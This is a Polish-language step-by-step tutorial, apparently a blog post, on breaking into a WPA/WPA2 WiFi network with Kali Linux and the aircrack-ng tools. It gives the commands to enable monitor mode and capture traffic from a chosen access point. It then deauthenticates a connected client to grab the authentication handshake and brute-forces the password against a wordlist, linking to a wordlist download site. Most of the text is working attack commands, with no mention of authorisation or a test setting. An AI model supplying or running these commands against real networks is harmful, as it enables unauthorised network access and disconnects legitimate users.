W celu złamania hasła do sieci WiFi wykorzystany został w tym przypadku system Kali Linux w wersji 2025.2 oraz karta sieciowa Intel Dual Band Wireless-AC 8265.
W skrócie oto lista kroków jakie trzeba wykonać:
- Zainstalowanie poprawnego sterownika karty sieciowej;
- Ustawienie karty sieciowej w tryb monitorowania;
- Rozpoczęcie przechwytywania pakietów;
- Rozłączenie klienta, który jest aktualnie podłączony do sieci w celu jego ponownego połączenia i przechwycenia w ten sposób pakietów autoryzacyjnych;
- Wyłączenie trybu monitorowania karty sieciowej;
- Rozkodowanie hasła z przechwyconych pakietów (z pliku z rozszerzeniem .cap);
Skonfigurowanie karty w tryb monitorowania
airmon-ng check airmon-ng check kill airmon-ng start wlan0
Airmon utworzy nowy interfejs sieciowy, w tym przypadku o nazwie wlan0mon. Do wyświetlenia wszystkich interfejsów bezprzewodowych służy polecenie iwconfig.
Wyświetlenie wszystkich sieci bezprzewodowych w pobliżu
airodump-ng wlan0mon
Rozpoczęcie przechwytywania pakietów do pliku capture_file
airodump-ng wlan0mon --bssid MAC_ADDRESS_OF_AP_HERE -c CHANNEL_NUMBER_HERE -w ./capture_file
Rozłączenie aktualnie podłączonego klienta w celu przechwycenia pakietów handshake – nawiązujących połączenie:
aireplay-ng wlan0mon --deauth NUMBER_OF_PACKETS_EGZAPLE_20 -a MAC_ADDRESS_OF_AP_HERE -h MAC_ADDRESS_OF_COMPUTER_CONNECTED_TO_NETWORK_HERE
Po wyświetleniu napisu WPA handshake: MAC_ADDRESS_OF_AP można zakończyć przechwytywanie pakietów.
Łamanie hasła za pomocą narzędzia aircrack-ng
aircrack-ng -w FILE_WITCH_WORDLIST wpa2-01.cap
Wyłączenie trybu monitorowania karty sieciowej
airmon-ng stop wlan0mon
Restart serwisu
service network-manager start
Listy słownikowe do łamania haseł metodą bruteforce można pobrać pod adresem:
https://www.wirelesshack.org/wpa-wpa2-word-list-dictionaries.html